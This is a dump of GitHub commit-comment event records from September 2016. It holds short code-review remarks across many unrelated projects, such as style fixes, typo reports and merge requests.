{"id":"4503744275","type":"CommitCommentEvent","actor":{"login":"zerolab"},"repo":{"name":"torchbox/wagtail-torchbox"},"payload":{"comment":{"id":18866739,"position":141,"line":74,"path":"tbx/core/templates/torchbox/about_page.html","commit_id":"af1f668475482ec857869626a4588e7070367b38","created_at":"2016-09-01T16:44:03Z","updated_at":"2016-09-01T16:44:03Z","body":"The `.values` images need `height:auto;`\r\nMay not hurt to add this globally, but that is a FE decision"}},"created_at":"2016-09-01T16:44:03Z"}
{"id":"4503745046","type":"CommitCommentEvent","actor":{"login":"mixan63rus"},"repo":{"name":"bitpay/bitcore-node"},"payload":{"comment":{"id":18866740,"position":15,"line":15,"path":"benchmarks/blockhandler.js","commit_id":"7e70bbfa7d32725789204c68910b81429e4c8b9a","created_at":"2016-09-01T16:44:12Z","updated_at":"2016-09-01T16:44:12Z","body":"a08185308182020101302c06072a8648ce3d0101022100"}},"created_at":"2016-09-01T16:44:12Z"}
{"id":"4503747474","type":"CommitCommentEvent","actor":{"login":"noobName"},"repo":{"name":"noobName/onlineStore"},"payload":{"comment":{"id":18866748,"position":4,"line":4,"path":".idea/vcs.xml","commit_id":"ae46018c6378f8a1400b9ec4553b9709c0f5e317","created_at":"2016-09-01T16:44:39Z","updated_at":"2016-09-01T16:44:39Z","body":"asdad"}},"created_at":"2016-09-01T16:44:39Z"}
{"id":"4503752827","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18866760,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T16:45:37Z","updated_at":"2016-09-01T16:45:37Z","body":"Gonna have another minor pull request coming your way. in SetXY, I got Global stacking rules, Cargo Ships, and BALANCE Core all running together, need to remedy that because one or the other might not be turned on and therefore not fire properly. And I need to make sure we aren't delayed death in DoTurn before checking nearbyunit promotions."}},"created_at":"2016-09-01T16:45:37Z"}
{"id":"4503757161","type":"CommitCommentEvent","actor":{"login":"TheNinf"},"repo":{"name":"TheNinf/Mtb"},"payload":{"comment":{"id":18866768,"position":null,"line":null,"path":null,"commit_id":"f3890472de169decafb95dbcbde11ff652785a00","created_at":"2016-09-01T16:46:24Z","updated_at":"2016-09-01T16:46:24Z","body":"Con esta mejora se ha reducido el uso del CPU de 30%-34% al 10%-13%"}},"created_at":"2016-09-01T16:46:24Z"}
{"id":"4503782030","type":"CommitCommentEvent","actor":{"login":"kesienaAkp"},"repo":{"name":"andela-kndungu/document-ms-frontend"},"payload":{"comment":{"id":18866830,"position":null,"line":null,"path":null,"commit_id":"722411644b05c9628c8c6c62c5730d5334a09232","created_at":"2016-09-01T16:51:16Z","updated_at":"2016-09-01T16:51:16Z","body":"Following the standardization process of converting all component files/directories to Pascal case, this does not conform: `app/components/home/UserHome/**body**/Index.jsx`, it should be `app/components/home/UserHome/**Body**/Index.jsx`, as Body is the actual name of the class."}},"created_at":"2016-09-01T16:51:16Z"}
{"id":"4503787343","type":"CommitCommentEvent","actor":{"login":"embrilliant"},"repo":{"name":"emilyFrontend/website"},"payload":{"comment":{"id":18866846,"position":46,"line":104,"path":"src/styles/_header.scss","commit_id":"9f8e0b54ce66b36a7a70f65eabc1d99d8fbfe256","created_at":"2016-09-01T16:52:18Z","updated_at":"2016-09-01T16:52:18Z","body":"Hi @0nn0 ,\r\n\r\nAfter reading the Sass Style Guide, I tried to nest media queries. But this doesn’t work :(. "}},"created_at":"2016-09-01T16:52:18Z"}
{"id":"4503791600","type":"CommitCommentEvent","actor":{"login":"balta2ar"},"repo":{"name":"universal-ctags/ctags"},"payload":{"comment":{"id":18866858,"position":6,"line":250,"path":"main/options.c","commit_id":"9135e21d4833d104ddf50b7fbc0a77ab9d21e766","created_at":"2016-09-01T16:53:09Z","updated_at":"2016-09-01T16:53:09Z","body":"@masatake @blueyed Isn't this a typo? There is no option `--list-flags`, but there is option `--list-fields`."}},"created_at":"2016-09-01T16:53:09Z"}
{"id":"4503793074","type":"CommitCommentEvent","actor":{"login":"TtimmEwath"},"repo":{"name":"TtimmEwath/M2"},"payload":{"comment":{"id":18866860,"position":null,"line":null,"path":null,"commit_id":"ca840d65bf173ae8fe56b4e6d92a60d0cfa148cc","created_at":"2016-09-01T16:53:25Z","updated_at":"2016-09-01T16:53:25Z","body":"Good job\n"}},"created_at":"2016-09-01T16:53:25Z"}
{"id":"4503793109","type":"CommitCommentEvent","actor":{"login":"embrilliant"},"repo":{"name":"emilyFrontend/website"},"payload":{"comment":{"id":18866862,"position":12,"line":19,"path":"src/styles/_mixins.scss","commit_id":"9f8e0b54ce66b36a7a70f65eabc1d99d8fbfe256","created_at":"2016-09-01T16:53:25Z","updated_at":"2016-09-01T16:53:25Z","body":"@0nn0  the mixin of media-query is defined here. I guess it's not defined correctly?"}},"created_at":"2016-09-01T16:53:25Z"}
{"id":"4503795212","type":"CommitCommentEvent","actor":{"login":"sbellity"},"repo":{"name":"hull-ships/hull-mailchimp"},"payload":{"comment":{"id":18866868,"position":1,"line":1,"path":"server/lib/queue/queue-agent.js","commit_id":"9a69b95e89975d015128cfe915f7662d452da2ff","created_at":"2016-09-01T16:53:51Z","updated_at":"2016-09-01T16:53:51Z","body":"@michaloo supertest here ?"}},"created_at":"2016-09-01T16:53:51Z"}
{"id":"4503795843","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18866875,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T16:53:57Z","updated_at":"2016-09-01T16:53:57Z","body":"Sounds good. Take your time, tweaking some diplo/unitai things myself."}},"created_at":"2016-09-01T16:53:57Z"}
{"id":"4503798880","type":"CommitCommentEvent","actor":{"login":"kesienaAkp"},"repo":{"name":"andela-kndungu/document-ms-frontend"},"payload":{"comment":{"id":18866878,"position":18,"line":11,"path":"server/controllers/helpers/authorise.js","commit_id":"edcb742fb684633fff9acd29a836e1b54883cecc","created_at":"2016-09-01T16:54:33Z","updated_at":"2016-09-01T16:54:33Z","body":"So much better, 80% code line count reduction."}},"created_at":"2016-09-01T16:54:33Z"}
{"id":"4503801189","type":"CommitCommentEvent","actor":{"login":"masatake"},"repo":{"name":"universal-ctags/ctags"},"payload":{"comment":{"id":18866886,"position":6,"line":250,"path":"main/options.c","commit_id":"9135e21d4833d104ddf50b7fbc0a77ab9d21e766","created_at":"2016-09-01T16:54:59Z","updated_at":"2016-09-01T16:54:59Z","body":"Yes, you are right.\r\nI'm happy if you make a pull request."}},"created_at":"2016-09-01T16:54:59Z"}
{"id":"4503804550","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/engagement-l10n"},"payload":{"comment":{"id":18866894,"position":null,"line":null,"path":null,"commit_id":"2bd557fdf3b3c7d0d54ec32e8b509c106161f4f7","created_at":"2016-09-01T16:55:36Z","updated_at":"2016-09-01T16:55:36Z","body":"Notifiche per me /cc @kitsunenosaraT \r\n"}},"created_at":"2016-09-01T16:55:36Z"}
{"id":"4503805413","type":"CommitCommentEvent","actor":{"login":"FGDATA"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18866895,"position":null,"line":null,"path":null,"commit_id":"b8fa87805d03875d20956843d80a3498038912b8","created_at":"2016-09-01T16:55:48Z","updated_at":"2016-09-01T16:55:48Z","body":"@GabrielVenezuela \r\n\r\nSome sound missing files\r\n\r\nSpecifically\r\n\r\neng_run_ext1_loop.wav\r\neng_run_int_1340.wav\r\n\r\n\r\nPlease, push?"}},"created_at":"2016-09-01T16:55:48Z"}
{"id":"4503806336","type":"CommitCommentEvent","actor":{"login":"Eric89GXL"},"repo":{"name":"mne-tools/mne-python"},"payload":{"comment":{"id":18866902,"position":null,"line":null,"path":null,"commit_id":"969d8b90411978f0500570004699b33dd8c4f347","created_at":"2016-09-01T16:55:58Z","updated_at":"2016-09-01T16:55:58Z","body":"@jaeilepp this might fix your builds"}},"created_at":"2016-09-01T16:55:58Z"}
{"id":"4503810308","type":"CommitCommentEvent","actor":{"login":"FireNeslo"},"repo":{"name":"FireNeslo/blobify"},"payload":{"comment":{"id":18866907,"position":5,"line":17,"path":"index.js","commit_id":"5556a86dc97d97c0b841e05683b2081b7345d354","created_at":"2016-09-01T16:56:36Z","updated_at":"2016-09-01T16:56:36Z","body":"@derhuerst If we add the mime type detection i want this piece back. also default to the blob extension, i deleted your comment by mistake."}},"created_at":"2016-09-01T16:56:36Z"}
{"id":"4503811244","type":"CommitCommentEvent","actor":{"login":"nojhamster"},"repo":{"name":"ezpaarse-project/ezpaarse"},"payload":{"comment":{"id":18866910,"position":5,"line":110,"path":"Makefile","commit_id":"fed23ae1cee903a18641ba0ed57079ee49bb25ae","created_at":"2016-09-01T16:56:47Z","updated_at":"2016-09-01T16:56:47Z","body":"Yep, ça marche comme n'importe quel script npm :)"}},"created_at":"2016-09-01T16:56:47Z"}
{"id":"4503815197","type":"CommitCommentEvent","actor":{"login":"kesienaAkp"},"repo":{"name":"andela-kndungu/document-ms-frontend"},"payload":{"comment":{"id":18866920,"position":5,"line":38,"path":"app/components/home/UserHome/body/AddDocument/AddDocumentForm.jsx","commit_id":"9714b0dc4adfb47b711d28d14862d947b544f3e3","created_at":"2016-09-01T16:57:34Z","updated_at":"2016-09-01T16:57:34Z","body":"This is great, but how about the already existent categories?, they'ld still be in **whatever case**. You can(and should) either use css(inline or otherwise) to coerce the the categories into capitalized case or do that with javascript from within the autocomplete component, your call."}},"created_at":"2016-09-01T16:57:34Z"}
{"id":"4503815681","type":"CommitCommentEvent","actor":{"login":"vins31"},"repo":{"name":"gariyanto/scikits.icp"},"payload":{"comment":{"id":18866923,"position":6,"line":6,"path":"scikits/icp/tests/generate_wave.py","commit_id":"fac203dec95b7dd4470930d844b3eebb3be9c898","created_at":"2016-09-01T16:57:40Z","updated_at":"2016-09-01T16:57:40Z","body":"Where does the module sckikits.mesh comes from? I did not find it on https://scikits.appspot.com/scikits"}},"created_at":"2016-09-01T16:57:40Z"}
{"id":"4503817787","type":"CommitCommentEvent","actor":{"login":"Treeston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18866932,"position":null,"line":null,"path":null,"commit_id":"5f43e7b964d48d57ec7fabdbf36a832aee53dca4","created_at":"2016-09-01T16:58:04Z","updated_at":"2016-09-01T16:58:04Z","body":"ref f5cbc17"}},"created_at":"2016-09-01T16:58:04Z"}
{"id":"4503821092","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"FireNeslo/blobify"},"payload":{"comment":{"id":18866941,"position":5,"line":17,"path":"index.js","commit_id":"5556a86dc97d97c0b841e05683b2081b7345d354","created_at":"2016-09-01T16:58:42Z","updated_at":"2016-09-01T16:58:42Z","body":"can you elaborate on that? I don't understand what you mean?"}},"created_at":"2016-09-01T16:58:42Z"}
{"id":"4503833695","type":"CommitCommentEvent","actor":{"login":"andreasabel"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":18866981,"position":18,"line":212,"path":"src/full/Agda/TypeChecking/Reduce/Fast.hs","commit_id":"aee0e9c9aaef56fc2c3ed018fd80b0f014dba43f","created_at":"2016-09-01T17:01:00Z","updated_at":"2016-09-01T17:01:00Z","body":"Isn't `f` a dead argument?  Anyhow, it is shadowed in case `Def f es` below."}},"created_at":"2016-09-01T17:01:00Z"}
{"id":"4503834100","type":"CommitCommentEvent","actor":{"login":"jaimerosales"},"repo":{"name":"Developer-Autodesk/LmvQuickStart"},"payload":{"comment":{"id":18866982,"position":36,"line":188,"path":"index.html","commit_id":"b1e3fc46540c7c4a1affdc82081a5081b7e73600","created_at":"2016-09-01T17:01:06Z","updated_at":"2016-09-01T17:01:06Z","body":"Need to remove secret Key :) "}},"created_at":"2016-09-01T17:01:06Z"}
{"id":"4503837600","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18866994,"position":null,"line":null,"path":null,"commit_id":"5eb8d78092016caa35605359ed6d2a5124fd4853","created_at":"2016-09-01T17:01:49Z","updated_at":"2016-09-01T17:01:49Z","body":"To PRO."}},"created_at":"2016-09-01T17:01:49Z"}
{"id":"4503838122","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18866995,"position":null,"line":null,"path":null,"commit_id":"4d0fa5df06b33e97d1a31a6ce322f34b2b3eb899","created_at":"2016-09-01T17:01:56Z","updated_at":"2016-09-01T17:01:56Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://54.234.50.226:8080/ui#review:id=60)"}},"created_at":"2016-09-01T17:01:56Z"}
{"id":"4503838767","type":"CommitCommentEvent","actor":{"login":"peterhry"},"repo":{"name":"hegemonic/taffydb"},"payload":{"comment":{"id":18866996,"position":null,"line":null,"path":null,"commit_id":"507d2d75fa16e1386f6d50abee1894b264d4458b","created_at":"2016-09-01T17:02:05Z","updated_at":"2016-09-01T17:02:05Z","body":"+1"}},"created_at":"2016-09-01T17:02:05Z"}
{"id":"4503838829","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/RetroArch"},"payload":{"comment":{"id":18866997,"position":null,"line":null,"path":null,"commit_id":"fea033268ac8beb475b2918a8a1a41219a15f599","created_at":"2016-09-01T17:02:06Z","updated_at":"2016-09-01T17:02:06Z","body":"Doesn't seem to be compatible then with the earlier PSP SDK and the 'real' Vita SDK, so I somehow question this move. Seems like a waste of time and all it does is complicate things for us here since it requires the need to ifdef this since the PSP SDK doesn't even have this typedef.\r\n\r\nHopefully leaving it like this will still compile."}},"created_at":"2016-09-01T17:02:06Z"}
{"id":"4503839348","type":"CommitCommentEvent","actor":{"login":"iesteban"},"repo":{"name":"Semillas/semillas_backend"},"payload":{"comment":{"id":18866999,"position":16,"line":30,"path":"board/models.py","commit_id":"3d67e06b2a9968033e4f6b18c7ee078b1174711f","created_at":"2016-09-01T17:02:11Z","updated_at":"2016-09-01T17:02:11Z","body":"__unicode__ is preferred"}},"created_at":"2016-09-01T17:02:11Z"}
{"id":"4503841951","type":"CommitCommentEvent","actor":{"login":"iesteban"},"repo":{"name":"Semillas/semillas_backend"},"payload":{"comment":{"id":18867008,"position":17,"line":31,"path":"board/models.py","commit_id":"3d67e06b2a9968033e4f6b18c7ee078b1174711f","created_at":"2016-09-01T17:02:42Z","updated_at":"2016-09-01T17:02:42Z","body":"There is no username"}},"created_at":"2016-09-01T17:02:42Z"}
{"id":"4503842141","type":"CommitCommentEvent","actor":{"login":"agnivade"},"repo":{"name":"tldr-pages/tldr"},"payload":{"comment":{"id":18867009,"position":null,"line":null,"path":null,"commit_id":"34aec29c0886bf0257f7b090af8329c2c7f06dc7","created_at":"2016-09-01T17:02:44Z","updated_at":"2016-09-01T17:02:44Z","body":"will do."}},"created_at":"2016-09-01T17:02:44Z"}
{"id":"4503844409","type":"CommitCommentEvent","actor":{"login":"Matt-247"},"repo":{"name":"Matt-247/Matt-247.github.io"},"payload":{"comment":{"id":18867017,"position":null,"line":null,"path":null,"commit_id":"312a4038051a680520da2e4fe2c6d4000f32e41c","created_at":"2016-09-01T17:03:12Z","updated_at":"2016-09-01T17:03:12Z","body":"Edited html index page as the Notepad version lost the header and paragraph info when added to the desktop app."}},"created_at":"2016-09-01T17:03:12Z"}
{"id":"4503845517","type":"CommitCommentEvent","actor":{"login":"embrilliant"},"repo":{"name":"emilyFrontend/website"},"payload":{"comment":{"id":18867021,"position":18,"line":30,"path":"src/styles/_variables.scss","commit_id":"9f8e0b54ce66b36a7a70f65eabc1d99d8fbfe256","created_at":"2016-09-01T17:03:25Z","updated_at":"2016-09-01T17:03:25Z","body":"\"699px\" seems strange. But I thought \"@media (max-width\" means \"less than\". Is that right?"}},"created_at":"2016-09-01T17:03:25Z"}
{"id":"4503850701","type":"CommitCommentEvent","actor":{"login":"anuradha27"},"repo":{"name":"drishticone/2.0.0"},"payload":{"comment":{"id":18867032,"position":null,"line":null,"path":null,"commit_id":"f32c34808dcd211e9ada9ba8c93357f22373dbf2","created_at":"2016-09-01T17:04:25Z","updated_at":"2016-09-01T17:04:25Z","body":"this index.php is incomplete as one member is missing..\r\n"}},"created_at":"2016-09-01T17:04:25Z"}
{"id":"4503852688","type":"CommitCommentEvent","actor":{"login":"TtimmEwath"},"repo":{"name":"TtimmEwath/M2"},"payload":{"comment":{"id":18867038,"position":null,"line":null,"path":null,"commit_id":"98903a6a36d7a8186b8bb8c38bf10ea3b8e33fec","created_at":"2016-09-01T17:04:49Z","updated_at":"2016-09-01T17:04:49Z","body":"Good job\n"}},"created_at":"2016-09-01T17:04:49Z"}
{"id":"4503854989","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":18867042,"position":14,"line":59,"path":"movies.rb","commit_id":"6253f432fbe911183131932cd6df73d5188a52cf","created_at":"2016-09-01T17:05:16Z","updated_at":"2016-09-01T17:05:16Z","body":"1. думаем, что у нас там. а у нас там уже вовсе не movie, а две штуки — месяц + фильмы этого месяца. хотя бы так надо было бы написать: `sort_by { |month_and_movies|` — но, к счастю, не надо, потому что можно вот так: `sort_by{ |month, movies| month`\r\n2. есть и другой способ думать об этом — получится даже короче: у нас там пара, пара — это массив, а отсортировать надо по первому элементу массива: `sort_by(&:first)` — потому что http://ruby-doc.org/core-2.2.3/Symbol.html#method-i-to_proc\r\n3. наконец, есть третий способ думать об этом! куча пар = куча массивов — может быть отсортирована просто методом `.sort` без уточнений, потому шт массивы массивов так и сортируются (по первому элементу, затем по второму и т.д.)"}},"created_at":"2016-09-01T17:05:16Z"}
{"id":"4503856996","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":18867045,"position":15,"line":60,"path":"movies.rb","commit_id":"6253f432fbe911183131932cd6df73d5188a52cf","created_at":"2016-09-01T17:05:39Z","updated_at":"2016-09-01T17:05:39Z","body":"Замечание (1) из коммента выше применимо здесь во всей своей полноте."}},"created_at":"2016-09-01T17:05:39Z"}
{"id":"4503860905","type":"CommitCommentEvent","actor":{"login":"zfi"},"repo":{"name":"parallaxinc/Scribbler-3_Library"},"payload":{"comment":{"id":18867054,"position":null,"line":null,"path":null,"commit_id":"1f8e66b3fec0d50d3231dd7ae44490a49ecb5e76","created_at":"2016-09-01T17:06:20Z","updated_at":"2016-09-01T17:06:20Z","body":"Pushed CloudCompiler-SpinLib-2016-09-01.094716 to Demo"}},"created_at":"2016-09-01T17:06:20Z"}
{"id":"4503861484","type":"CommitCommentEvent","actor":{"login":"mukundpadale"},"repo":{"name":"yuvavadyapathak/yuvavadyapathak"},"payload":{"comment":{"id":18867056,"position":null,"line":null,"path":null,"commit_id":"67dc43e0afe95e248fb508147042b1b7ccdfcdce","created_at":"2016-09-01T17:06:27Z","updated_at":"2016-09-01T17:06:27Z","body":"mark for delete"}},"created_at":"2016-09-01T17:06:27Z"}
{"id":"4503861666","type":"CommitCommentEvent","actor":{"login":"jesconstantine"},"repo":{"name":"clairesunstudio/acme"},"payload":{"comment":{"id":18867057,"position":null,"line":null,"path":null,"commit_id":"0b7ec6a72b3beca8c3943f026bec04786afd2a70","created_at":"2016-09-01T17:06:29Z","updated_at":"2016-09-01T17:06:29Z","body":"Looks good to me!"}},"created_at":"2016-09-01T17:06:29Z"}
{"id":"4503863497","type":"CommitCommentEvent","actor":{"login":"karasu"},"repo":{"name":"Antergos/Cnchi"},"payload":{"comment":{"id":18867065,"position":null,"line":null,"path":null,"commit_id":"4640202ad3f537bf6c59c5040b6296fe76004473","created_at":"2016-09-01T17:06:52Z","updated_at":"2016-09-01T17:06:52Z","body":"@lots0logs tell me if you want me to test this."}},"created_at":"2016-09-01T17:06:52Z"}
{"id":"4503872654","type":"CommitCommentEvent","actor":{"login":"arokem"},"repo":{"name":"nipy/dipy"},"payload":{"comment":{"id":18867089,"position":17,"line":424,"path":"dipy/reconst/tests/test_ivim.py","commit_id":"b8fcf0b2ae70727495c4401da9897dd1306f56cb","created_at":"2016-09-01T17:08:43Z","updated_at":"2016-09-01T17:08:43Z","body":"Did you mean to commit this last change (testing only `test_leastsq_error`)? "}},"created_at":"2016-09-01T17:08:43Z"}
{"id":"4503874366","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18867093,"position":null,"line":null,"path":null,"commit_id":"1eda389ba40b8359473decfb2b87b076a7c4bb72","created_at":"2016-09-01T17:09:05Z","updated_at":"2016-09-01T17:09:05Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [source/_partials/footer_scripts.html](https://github.com/pantheon-systems/documentation/commit/9337ea76d6c101d1032b3a5964192eae50b849ec/source/_partials/footer_scripts.html)\n- [source/_views/terminuspage.html](https://github.com/pantheon-systems/documentation/commit/9337ea76d6c101d1032b3a5964192eae50b849ec/source/_views/terminuspage.html)\n- [source/docs/_terminuspages/01-getting-started.md](https://github.com/pantheon-systems/documentation/commit/9337ea76d6c101d1032b3a5964192eae50b849ec/source/docs/_terminuspages/01-getting-started.md)\n- [source/docs/_terminuspages/02-install.md](https://github.com/pantheon-systems/documentation/commit/9337ea76d6c101d1032b3a5964192eae50b849ec/source/docs/_terminuspages/02-install.md)\n- [source/docs/_terminuspages/03-examples.md](https://github.com/pantheon-systems/documentation/commit/9337ea76d6c101d1032b3a5964192eae50b849ec/source/docs/_terminuspages/03-examples.md)\n- [source/docs/_terminuspages/04-extend.html](https://github.com/pantheon-systems/documentation/commit/9337ea76d6c101d1032b3a5964192eae50b849ec/source/docs/_terminuspages/04-extend.html)\n- [source/docs/_terminuspages/05-commands.md](https://github.com/pantheon-systems/documentation/commit/9337ea76d6c101d1032b3a5964192eae50b849ec/source/docs/_terminuspages/05-commands.md)\n- [source/docs/_terminuspages/06-versions.md](https://github.com/pantheon-systems/documentation/commit/9337ea76d6c101d1032b3a5964192eae50b849ec/source/docs/_terminuspages/06-versions.md)\n- [source/docs/_terminuspages/commands.md](https://github.com/pantheon-systems/documentation/commit/9337ea76d6c101d1032b3a5964192eae50b849ec/source/docs/_terminuspages/commands.md)\n- [source/docs/_terminuspages/examples.md](https://github.com/pantheon-systems/documentation/commit/9337ea76d6c101d1032b3a5964192eae50b849ec/source/docs/_terminuspages/examples.md)\n- [source/docs/_terminuspages/extend.html](https://github.com/pantheon-systems/documentation/commit/9337ea76d6c101d1032b3a5964192eae50b849ec/source/docs/_terminuspages/extend.html)\n- [source/docs/_terminuspages/getting-started.md](https://github.com/pantheon-systems/documentation/commit/9337ea76d6c101d1032b3a5964192eae50b849ec/source/docs/_terminuspages/getting-started.md)\n- [source/docs/_terminuspages/install.md](https://github.com/pantheon-systems/documentation/commit/9337ea76d6c101d1032b3a5964192eae50b849ec/source/docs/_terminuspages/install.md)\n- [source/docs/_terminuspages/versions.md](https://github.com/pantheon-systems/documentation/commit/9337ea76d6c101d1032b3a5964192eae50b849ec/source/docs/_terminuspages/versions.md)\n- [Gruntfile.js](https://github.com/pantheon-systems/documentation/commit/1eda389ba40b8359473decfb2b87b076a7c4bb72/Gruntfile.js)\n- [composer.json](https://github.com/pantheon-systems/documentation/commit/1eda389ba40b8359473decfb2b87b076a7c4bb72/composer.json)\n- [composer.lock](https://github.com/pantheon-systems/documentation/commit/1eda389ba40b8359473decfb2b87b076a7c4bb72/composer.lock)\n- [source/_views/default.html](https://github.com/pantheon-systems/documentation/commit/1eda389ba40b8359473decfb2b87b076a7c4bb72/source/_views/default.html)\n- [source/docs/_terminuspages/03-examples.html](https://github.com/pantheon-systems/documentation/commit/1eda389ba40b8359473decfb2b87b076a7c4bb72/source/docs/_terminuspages/03-examples.html)\n- [source/docs/assets/js/main.js](https://github.com/pantheon-systems/documentation/commit/1eda389ba40b8359473decfb2b87b076a7c4bb72/source/docs/assets/js/main.js)\n- [source/docs/assets/js/vendor/zeroclipboard/zeroclipboard/dist/ZeroClipboard.js](https://github.com/pantheon-systems/documentation/commit/1eda389ba40b8359473decfb2b87b076a7c4bb72/source/docs/assets/js/vendor/zeroclipboard/zeroclipboard/dist/ZeroClipboard.js)\n- [source/docs/assets/js/vendor/zeroclipboard/zeroclipboard/dist/ZeroClipboard.swf](https://github.com/pantheon-systems/documentation/commit/1eda389ba40b8359473decfb2b87b076a7c4bb72/source/docs/assets/js/vendor/zeroclipboard/zeroclipboard/dist/ZeroClipboard.swf)\n"}},"created_at":"2016-09-01T17:09:05Z"}
{"id":"4503883105","type":"CommitCommentEvent","actor":{"login":"Hunain-Khalid"},"repo":{"name":"Hunain-Khalid/DiceApp"},"payload":{"comment":{"id":18867112,"position":null,"line":null,"path":null,"commit_id":"0158aa930439bfd1a090b2c3610232a0b70011ac","created_at":"2016-09-01T17:10:48Z","updated_at":"2016-09-01T17:10:48Z","body":"Still need clean picture and launcher icons, once that is done, the can can be deployed. "}},"created_at":"2016-09-01T17:10:48Z"}
{"id":"4503888240","type":"CommitCommentEvent","actor":{"login":"xlazom00"},"repo":{"name":"xlazom00/hls.js"},"payload":{"comment":{"id":18867125,"position":454,"line":852,"path":"src/demux/tsdemuxer.js","commit_id":"db6a87552e6b07ec36eb952b2eb700fb000149ca","created_at":"2016-09-01T17:11:45Z","updated_at":"2016-09-01T17:11:45Z","body":"look down"}},"created_at":"2016-09-01T17:11:45Z"}
{"id":"4503889660","type":"CommitCommentEvent","actor":{"login":"kshelley"},"repo":{"name":"sayedihashimi/package-web"},"payload":{"comment":{"id":18867126,"position":null,"line":null,"path":null,"commit_id":"0aaa591588db516f615e53f74b84455f2b5d4ec6","created_at":"2016-09-01T17:12:03Z","updated_at":"2016-09-01T17:12:03Z","body":"Is it possible to merge this and create a release? I've tested it with both an IIS host and on Azure and it seems to fix the nested site issue for my purposes"}},"created_at":"2016-09-01T17:12:03Z"}
{"id":"4503898135","type":"CommitCommentEvent","actor":{"login":"rjiuk3566"},"repo":{"name":"rjiuk3566/Pindish"},"payload":{"comment":{"id":18867149,"position":23,"line":0,"path":"src/js/app.js","commit_id":"048abe29f75c12fd769fda81458b90dddadd2c3b","created_at":"2016-09-01T17:13:35Z","updated_at":"2016-09-01T17:13:35Z","body":"you remember about name. nice"}},"created_at":"2016-09-01T17:13:35Z"}
{"id":"4503898820","type":"CommitCommentEvent","actor":{"login":"amir73il"},"repo":{"name":"albamc/docker"},"payload":{"comment":{"id":18867151,"position":null,"line":null,"path":null,"commit_id":"6f7b1d025cb414492bc5c0c274d49268062c19ee","created_at":"2016-09-01T17:13:43Z","updated_at":"2016-09-01T17:13:43Z","body":"1. you must add Signed-off-by: Amir Goldstein <amir73il@aquasec.com>\r\n(and keep your own signed-off-by as well) when you take my code and change it \r\n2. you should keep this change separate from you own patch set,\r\ni.e. split the change \"and use this code to apply quota for overlay\" and squash it with previous\r\nimplementation - there is no need for the old implementation to remain in the PR now\r\n3. perhaps a better name for quota.go would be project_quota.go? to not confuse with btrfs quotas. not insisting"}},"created_at":"2016-09-01T17:13:43Z"}
{"id":"4503902508","type":"CommitCommentEvent","actor":{"login":"TJScalzo"},"repo":{"name":"tholman/inspiring-online"},"payload":{"comment":{"id":18867159,"position":null,"line":null,"path":null,"commit_id":"09f7791dbc95622c86bff531c336098703a9fd07","created_at":"2016-09-01T17:14:25Z","updated_at":"2016-09-01T17:14:25Z","body":"This relates to #217."}},"created_at":"2016-09-01T17:14:25Z"}
{"id":"4503903775","type":"CommitCommentEvent","actor":{"login":"TJScalzo"},"repo":{"name":"tholman/inspiring-online"},"payload":{"comment":{"id":18867164,"position":null,"line":null,"path":null,"commit_id":"09e4a67ec5b35c87a52c72658d6e6f07d3da61bb","created_at":"2016-09-01T17:14:41Z","updated_at":"2016-09-01T17:14:41Z","body":"This relates to #217."}},"created_at":"2016-09-01T17:14:41Z"}
{"id":"4503913912","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18867187,"position":null,"line":null,"path":null,"commit_id":"ab3dde3206e22977c5828174ead814bcd4066d9e","created_at":"2016-09-01T17:16:36Z","updated_at":"2016-09-01T17:16:36Z","body":"@snicolet By the way is it intended that the score grows back when `2 * ei.pi->open_files()` becomes greater than `pos.count<ALL_PIECES>(Us)` (being a quadratic function of `weight`), although that should only happen in some openings where many pawns are captured?"}},"created_at":"2016-09-01T17:16:36Z"}
{"id":"4503920041","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18867206,"position":null,"line":null,"path":null,"commit_id":"465fa52c6803bb327b337f4b225ddb95fefe05cd","created_at":"2016-09-01T17:17:46Z","updated_at":"2016-09-01T17:17:46Z","body":"It was for message type. I have no idea whats going on. I have to look it over."}},"created_at":"2016-09-01T17:17:46Z"}
{"id":"4503920045","type":"CommitCommentEvent","actor":{"login":"CptJohnnyWalker"},"repo":{"name":"CptJohnnyWalker/Dave_bot"},"payload":{"comment":{"id":18867207,"position":null,"line":null,"path":null,"commit_id":"504bea03a7bef3d80be6265f1fc77a574221e728","created_at":"2016-09-01T17:17:46Z","updated_at":"2016-09-01T17:17:46Z","body":"test"}},"created_at":"2016-09-01T17:17:46Z"}
